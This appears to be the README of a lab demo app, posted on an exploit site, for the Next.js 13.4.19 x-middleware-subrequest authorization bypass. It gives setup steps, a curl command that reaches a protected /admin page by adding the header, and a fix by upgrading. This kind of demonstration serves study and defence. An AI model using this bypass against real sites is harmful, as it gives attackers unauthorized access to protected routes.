## https://sploitus.com/exploit?id=671E7E6C-C3B3-59FA-B57B-9008377B0E54
# Next.js Authorization Bypass Demo
This application demonstrates the x-middleware-subrequest vulnerability in Next.js 13.4.19, which allows bypassing middleware protection.
## Setup
1. Install dependencies:
```bash
npm install
```
2. Start the development server:
```bash
npm run dev
```
## Vulnerability Demonstration
The application has an admin page at `/admin` that should be protected by middleware. However, it can be accessed without authentication using the x-middleware-subrequest header.
### Normal Flow
1. Visit `/admin` - You will be redirected to `/login`
2. Log in with any credentials - You will be redirected to `/admin`
### Bypass Method
To bypass the authentication, you can use curl or any HTTP client to make a request with the x-middleware-subrequest header:
```bash
curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin
```
## Security Implications
This vulnerability demonstrates how middleware protection can be bypassed in Next.js 13.4.19 by using the x-middleware-subrequest header. In a production environment, this could allow unauthorized access to protected routes.
## Fix
To fix this vulnerability, upgrade to a newer version of Next.js where this issue has been patched.